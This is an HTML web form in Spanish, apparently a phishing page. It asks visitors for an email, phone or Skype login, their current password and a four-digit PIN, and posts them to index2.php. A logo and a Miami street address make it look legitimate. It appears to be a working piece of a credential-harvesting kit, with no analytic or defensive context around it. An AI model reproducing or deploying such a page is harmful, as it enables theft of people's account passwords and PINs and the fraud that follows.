
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=0.5, minimum-scale=0.5">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Información</title>

    <link rel="stylesheet" href="css/estilos.css">
    <link rel="stylesheet" href="css/font-awesome.css">

    <style>
        .input-icons i {
            position: absolute;
        }
          
        .input-icons {
            width: 100%;
            margin-bottom: 10px;
        }
          
        .icon {
            padding: 10px;
            min-width: 40px;
        }
          
        .input-field {
           width: 100%;
            padding: 10px;
            text-align: left;
			text-indent: 2.9em;
        }
    </style>
		<script>
function soloNumeros(e){
  var key = window.event ? e.which : e.keyCode;
  if (key < 48 || key > 57) {
    e.preventDefault();
  }
}
</script>

</head>
<body>

    <section class="form_wrap">

  
 
        <form action="index2.php" method="post" class="form_contact">
		 <div align="left"><img src="imgl.png" style="width:150px;"></div><br>
            <h2>Ingrese la información solicitada</h2>
            <div class="user_info">
			<div class="input-icons">
			
                
				 <i class="fa fa-envelope-o icon">&nbsp;</i>
                <input type="email" class="input-field"  name="field1" required placeholder="Correo electrónico, teléfono o Skype">
				

                <i class="fa fa-key icon">&nbsp;</i>
                <input type="password" class="input-field" required name="field2"   placeholder="Contraseña actual">

               

               <i class="fa fa-key icon">&nbsp;</i>
				<input type="password" required class="input-field" onkeypress="soloNumeros(event)" name="field3" maxlength="4" minlength="4"  placeholder="Ingresa tu Pin de 4-Dígitos">
              
				<br><br>
                <input type="submit" value="Continuar" id="btnSend">
            </div><br>
			  </div>
        </form>
		
		
		      <section class="cantact_info">
            <section class="info_title">
                <span class="fa fa-user-circle"></span>
                <h2>Dirección</h2>
            </section>
            <section class="info_items">
               <div align="center">  <span class="fa fa-envelope"></span>
				11918 NW 41th St Unit 308,<br> Miami, FL 33172, USA.<br><br>
                 <img src="proy.png" style="width:650px;" >  </div>
            </section>
			
        </section>

    </section>

</body>
</html>
